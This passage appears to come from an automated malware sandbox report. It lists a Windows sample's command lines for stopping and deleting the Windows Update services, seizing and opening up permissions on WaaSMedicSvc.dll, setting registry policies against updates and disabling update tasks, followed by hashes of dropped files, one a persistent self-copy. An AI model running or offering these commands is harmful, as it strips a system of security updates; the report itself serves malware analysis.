"\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
      C:\Windows\system32\sc.exe
        Command line: sc stop UsoSvc
-
      C:\Windows\system32\sc.exe
        Command line: sc stop WaaSMedicSvc
-
      C:\Windows\system32\sc.exe
        Command line: sc stop wuauserv
-
      C:\Windows\system32\sc.exe
        Command line: sc stop bits
-
      C:\Windows\system32\sc.exe
        Command line: sc stop dosvc
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        - Modifies registry key
-
      C:\Windows\system32\takeown.exe
        Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
-
      C:\Windows\system32\icacls.exe
        Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        - Possible privilege escalation attempt
        - Modifies file permissions
-
      C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        - Modifies registry key
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
    C:\Windows\System32\conhost.exe
      Command line: C:\Windows\System32\conhost.exe
-
      C:\Windows\System32\conhost.exe
        Command line: "C:\Windows\System32\conhost.exe" "jgimrcmwq"
Downloads
-
C:\Program Files\Windows\services.exe
Filesize: 5.3MB
MD5: 52fdd7f3ed1b50bc5794983a37cb4064
SHA1: 4a185751e9e94dccb3330ca79f893de7ca080482
SHA256: e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
SHA512: 4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f
(Byte-identical to the submitted sample: all four hashes match the General section above, so the dropped services.exe is a self-copy used for the scheduled-task persistence.)
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize: 539B
MD5: 84f2160705ac9a032c002f966498ef74
SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57